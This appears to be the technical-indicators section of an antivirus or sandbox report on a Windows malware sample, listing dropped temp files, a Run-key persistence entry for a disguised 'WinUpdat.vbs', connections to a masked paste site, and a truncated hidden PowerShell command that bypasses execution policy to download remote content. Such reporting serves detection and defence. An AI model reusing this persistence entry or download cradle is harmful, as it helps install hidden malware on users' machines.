Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WinUpdat.vbs' = 'WScript.exe //b //e:vbscript "%TEMP%\WinUpdat.vbs"'
- %TEMP%\aut1.tmp
- %TEMP%\WinUpdat.exe
- %TEMP%\aut2.tmp
- %TEMP%\WinUpdat.vbs
- %TEMP%\nsh4.tmp\UserInfo.dll
- %TEMP%\nsh4.tmp\ioSpecial.ini
- %TEMP%\nsh4.tmp\modern-wizard.bmp
- %TEMP%\nsh4.tmp\modern-header.bmp
- %TEMP%\nsh4.tmp\InstallOptions.dll
- %TEMP%\aut1.tmp
- %TEMP%\aut2.tmp
- 'localhost':1039
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '%TEMP%\WinUpdat.exe'
- '<SYSTEM32>\wscript.exe' "%TEMP%\WinUpdat.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://e....